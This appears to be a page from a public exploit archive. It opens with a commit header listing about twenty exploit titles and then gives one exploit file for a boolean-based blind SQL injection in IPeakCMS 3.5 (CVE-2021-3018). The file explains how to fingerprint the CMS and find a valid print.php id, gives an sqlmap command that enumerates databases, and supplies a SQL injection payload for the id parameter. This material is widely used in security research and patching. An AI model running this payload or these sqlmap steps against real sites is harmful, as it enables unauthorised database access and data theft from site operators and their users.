e95d9f2c13
23 changes to exploits/shellcodes dirsearch 0.4.1 - CSV Injection IObit Uninstaller 10 Pro - Unquoted Service Path WinAVR Version 20100110 - Insecure Folder Permissions PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation H2 Database 1.4.199 - JNI Code Execution Responsive ELearning System 1.0 - 'id' Sql Injection Responsive E-Learning System 1.0 - 'id' Sql Injection Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF) IPeakCMS 3.5 - Boolean-based blind SQLi Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting WordPress Plugin litespeed cache 3.6 - 'server_ip' Cross-Site Scripting Responsive E-Learning System 1.0 - Unrestricted File Upload to RCE Responsive E-Learning System 1.0 - Stored Cross Site Scripting WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting Newgen Correspondence Management System (corms) eGov 12.0 - IDOR Resumes Management and Job Application Website 1.0 - RCE (Unauthenticated) Resumes Management and Job Application Website 1.0 - Multiple Stored XSS Gitea 1.7.5 - Remote Code Execution Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
15 lines
No EOL
742 B
Text
15 lines
No EOL
742 B
Text
# Exploit Title: IPeakCMS 3.5 - Boolean-based blind SQLi
|
||
# Date: 07.12.2020
|
||
# Exploit Author: MoeAlbarbari
|
||
# Vendor Homepage: https://ipeak.ch/
|
||
# Software Link: N/A
|
||
# Version: 3.5
|
||
# Tested on: BackBox Linux
|
||
# CVE : CVE-2021-3018
|
||
|
||
Check the CMS version :goto www.site.com/cms/ and you will notice that in the login box there is the CMS name and its version
|
||
Check if it's vulnerable, goto ->: site.com/cms/print.php if the print.php exists, then try to find any valid ID which returns page to print e.g: site.com/cms/print.php?id=1
|
||
Parameter: id (GET based)
|
||
Use SQLmap if you've found the valid id...
|
||
e.g: sqlmap -u "site.com/cms/print.php?id=1" --dbs
|
||
Payload : id=(SELECT (CASE WHEN(3104=3104) THEN 1 ELSE (SELECT 8458) END)) |